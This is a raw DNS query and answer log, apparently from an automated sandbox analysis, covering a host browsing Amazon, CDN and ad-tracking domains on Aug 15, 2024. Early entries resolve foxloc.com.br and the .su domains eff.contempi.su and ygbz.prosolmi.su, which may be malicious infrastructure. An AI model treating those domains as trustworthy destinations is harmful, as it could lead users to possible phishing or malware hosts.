                                                                                                                                                                                                        Aug 15, 2024 15:38:38.705708027 CEST192.168.2.41.1.1.10x2bcdStandard query (0)sync.sxp.smartclip.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.829309940 CEST192.168.2.41.1.1.10x61f0Standard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.829309940 CEST192.168.2.41.1.1.10x25c8Standard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.979702950 CEST192.168.2.41.1.1.10x6e04Standard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.979947090 CEST192.168.2.41.1.1.10x8ca6Standard query (0)usermatch.krxd.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.988401890 CEST192.168.2.41.1.1.10x69d4Standard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.997364044 CEST192.168.2.41.1.1.10x6d0bStandard query (0)csync.loopme.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.997515917 CEST192.168.2.41.1.1.10x9e83Standard query (0)csync.loopme.me65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.974256992 CEST192.168.2.41.1.1.10xcd28Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.975241899 CEST192.168.2.41.1.1.10x2250Standard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.202486038 CEST192.168.2.41.1.1.10x768Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.202697992 CEST192.168.2.41.1.1.10xe5d8Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.228001118 CEST192.168.2.41.1.1.10x4acfStandard query (0)www.amazon.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.228355885 CEST192.168.2.41.1.1.10xc4c3Standard query (0)www.amazon.de65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.639013052 CEST192.168.2.41.1.1.10x47f6Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.639408112 CEST192.168.2.41.1.1.10x9b2dStandard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.088541985 CEST192.168.2.41.1.1.10xb388Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.088673115 CEST192.168.2.41.1.1.10x9a31Standard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:43.207863092 CEST192.168.2.41.1.1.10xc386Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:43.208220959 CEST192.168.2.41.1.1.10x6606Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.021209955 CEST192.168.2.41.1.1.10x9b0cStandard query (0)www.amazon.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.021528006 CEST192.168.2.41.1.1.10x972fStandard query (0)www.amazon.de65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.241084099 CEST192.168.2.41.1.1.10xdcecStandard query (0)sync-amazon.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.242357016 CEST192.168.2.41.1.1.10x114bStandard query (0)sync-amazon.ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.255578995 CEST192.168.2.41.1.1.10xa979Standard query (0)static.siege-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.255871058 CEST192.168.2.41.1.1.10xde04Standard query (0)static.siege-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.851563931 CEST192.168.2.41.1.1.10x271cStandard query (0)static.siege-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.851982117 CEST192.168.2.41.1.1.10xcaa1Standard query (0)static.siege-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.583893061 CEST192.168.2.41.1.1.10x7590Standard query (0)unagi-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.584635973 CEST192.168.2.41.1.1.10x929Standard query (0)unagi-na.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.822992086 CEST192.168.2.41.1.1.10xa5c7Standard query (0)fls-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.823143005 CEST192.168.2.41.1.1.10xfce6Standard query (0)fls-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.500374079 CEST192.168.2.41.1.1.10x9dcdStandard query (0)fls-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.500737906 CEST192.168.2.41.1.1.10x436eStandard query (0)fls-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.359113932 CEST192.168.2.41.1.1.10x498cStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.359113932 CEST192.168.2.41.1.1.10xe2c7Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.491298914 CEST192.168.2.41.1.1.10x2874Standard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.490575075 CEST192.168.2.41.1.1.10x2ed2Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.490719080 CEST192.168.2.41.1.1.10x258aStandard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.540855885 CEST192.168.2.41.1.1.10x3609Standard query (0)d1nruqhae353qc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.541001081 CEST192.168.2.41.1.1.10x5fc4Standard query (0)d1nruqhae353qc.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.646703959 CEST192.168.2.41.1.1.10x9298Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.646846056 CEST192.168.2.41.1.1.10xbd3eStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.766001940 CEST192.168.2.41.1.1.10x3451Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.766127110 CEST192.168.2.41.1.1.10xad47Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.142292023 CEST192.168.2.41.1.1.10x837dStandard query (0)d2h8zr0m6mus4x.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.142919064 CEST192.168.2.41.1.1.10xf43dStandard query (0)d2h8zr0m6mus4x.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.101607084 CEST192.168.2.41.1.1.10xf97dStandard query (0)d1nruqhae353qc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.101778984 CEST192.168.2.41.1.1.10xb9e1Standard query (0)d1nruqhae353qc.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.090780973 CEST192.168.2.41.1.1.10xdb6fStandard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.090966940 CEST192.168.2.41.1.1.10xc81Standard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.091892004 CEST192.168.2.41.1.1.10x7b45Standard query (0)d2h8zr0m6mus4x.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.092020035 CEST192.168.2.41.1.1.10x69caStandard query (0)d2h8zr0m6mus4x.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.667321920 CEST192.168.2.41.1.1.10x65c3Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.667470932 CEST192.168.2.41.1.1.10xa935Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.676230907 CEST192.168.2.41.1.1.10x219aStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.411703110 CEST192.168.2.41.1.1.10x27f9Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.411937952 CEST192.168.2.41.1.1.10x5261Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.264535904 CEST192.168.2.41.1.1.10xfaabStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.264569044 CEST192.168.2.41.1.1.10x262Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.894673109 CEST192.168.2.41.1.1.10x67acStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.894881964 CEST192.168.2.41.1.1.10x8b2Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:08.608656883 CEST192.168.2.41.1.1.10x30ddStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:08.608901024 CEST192.168.2.41.1.1.10xfcf4Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.037559032 CEST192.168.2.41.1.1.10xacabStandard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.038197041 CEST192.168.2.41.1.1.10xb687Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.822082996 CEST192.168.2.41.1.1.10x2324Standard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.822496891 CEST192.168.2.41.1.1.10xea65Standard query (0)unagi-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Aug 15, 2024 15:37:45.480639935 CEST1.1.1.1192.168.2.40x8663No error (0)aeromexico.playable.videoghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:45.499775887 CEST1.1.1.1192.168.2.40x2131No error (0)aeromexico.playable.videoghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:45.499775887 CEST1.1.1.1192.168.2.40x2131No error (0)ghs.googlehosted.com216.58.206.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:47.059211016 CEST1.1.1.1192.168.2.40x15eeNo error (0)foxloc.com.br108.167.132.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:47.374284029 CEST1.1.1.1192.168.2.40x2f2cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:47.374511003 CEST1.1.1.1192.168.2.40x9d2fNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:51.369452000 CEST1.1.1.1192.168.2.40xc90fNo error (0)eff.contempi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:51.370182991 CEST1.1.1.1192.168.2.40xa2afNo error (0)eff.contempi.su172.67.144.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:51.370182991 CEST1.1.1.1192.168.2.40xa2afNo error (0)eff.contempi.su104.21.55.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.469208956 CEST1.1.1.1192.168.2.40xdc52No error (0)foxloc.com.br108.167.132.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.541560888 CEST1.1.1.1192.168.2.40xa77No error (0)ygbz.prosolmi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.541589022 CEST1.1.1.1192.168.2.40x14cdNo error (0)ygbz.prosolmi.su188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.541589022 CEST1.1.1.1192.168.2.40x14cdNo error (0)ygbz.prosolmi.su188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.665370941 CEST1.1.1.1192.168.2.40xc351No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.524620056 CEST1.1.1.1192.168.2.40x1b37No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.524620056 CEST1.1.1.1192.168.2.40x1b37No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.525234938 CEST1.1.1.1192.168.2.40x63fdNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.525234938 CEST1.1.1.1192.168.2.40x63fdNo error (0)tp.c9a5976c7-frontier.amazon.aewww.amazon.ae.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.533500910 CEST1.1.1.1192.168.2.40x15b8No error (0)ygbz.prosolmi.su188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.533500910 CEST1.1.1.1192.168.2.40x15b8No error (0)ygbz.prosolmi.su188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.536955118 CEST1.1.1.1192.168.2.40xec50No error (0)ygbz.prosolmi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718100071 CEST1.1.1.1192.168.2.40xdc4cNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718100071 CEST1.1.1.1192.168.2.40xdc4cNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718100071 CEST1.1.1.1192.168.2.40xdc4cNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718100071 CEST1.1.1.1192.168.2.40xdc4cNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718681097 CEST1.1.1.1192.168.2.40xaa0fNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718681097 CEST1.1.1.1192.168.2.40xaa0fNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718681097 CEST1.1.1.1192.168.2.40xaa0fNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.718720913 CEST1.1.1.1192.168.2.40x4d6aNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.719573021 CEST1.1.1.1192.168.2.40x215bNo error (0)completion.amazon.com44.215.128.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.720031977 CEST1.1.1.1192.168.2.40xae9No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.720031977 CEST1.1.1.1192.168.2.40xae9No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.720031977 CEST1.1.1.1192.168.2.40xae9No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.851244926 CEST1.1.1.1192.168.2.40xf8dbNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.851244926 CEST1.1.1.1192.168.2.40xf8dbNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.851244926 CEST1.1.1.1192.168.2.40xf8dbNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.851244926 CEST1.1.1.1192.168.2.40xf8dbNo error (0)c.media-amazon.com18.239.85.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.852803946 CEST1.1.1.1192.168.2.40xda14No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.852803946 CEST1.1.1.1192.168.2.40xda14No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.852803946 CEST1.1.1.1192.168.2.40xda14No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.852803946 CEST1.1.1.1192.168.2.40xda14No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.895966053 CEST1.1.1.1192.168.2.40xd582No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.895966053 CEST1.1.1.1192.168.2.40xd582No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.127.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.229.128.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com99.81.216.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.30.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.49.71.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.033871889 CEST1.1.1.1192.168.2.40xa05fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.31.133.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.034277916 CEST1.1.1.1192.168.2.40x604dNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.034277916 CEST1.1.1.1192.168.2.40x604dNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.034277916 CEST1.1.1.1192.168.2.40x604dNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549467087 CEST1.1.1.1192.168.2.40xc2f0No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549467087 CEST1.1.1.1192.168.2.40xc2f0No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549467087 CEST1.1.1.1192.168.2.40xc2f0No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549467087 CEST1.1.1.1192.168.2.40xc2f0No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.549884081 CEST1.1.1.1192.168.2.40x7c31No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:59.474513054 CEST1.1.1.1192.168.2.40xee07No error (0)unagi-eu.amazon.com52.95.122.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.817981958 CEST1.1.1.1192.168.2.40xb6abNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.820924997 CEST1.1.1.1192.168.2.40xf571No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.820924997 CEST1.1.1.1192.168.2.40xf571No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.820924997 CEST1.1.1.1192.168.2.40xf571No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.844726086 CEST1.1.1.1192.168.2.40xf8ceNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.844726086 CEST1.1.1.1192.168.2.40xf8ceNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
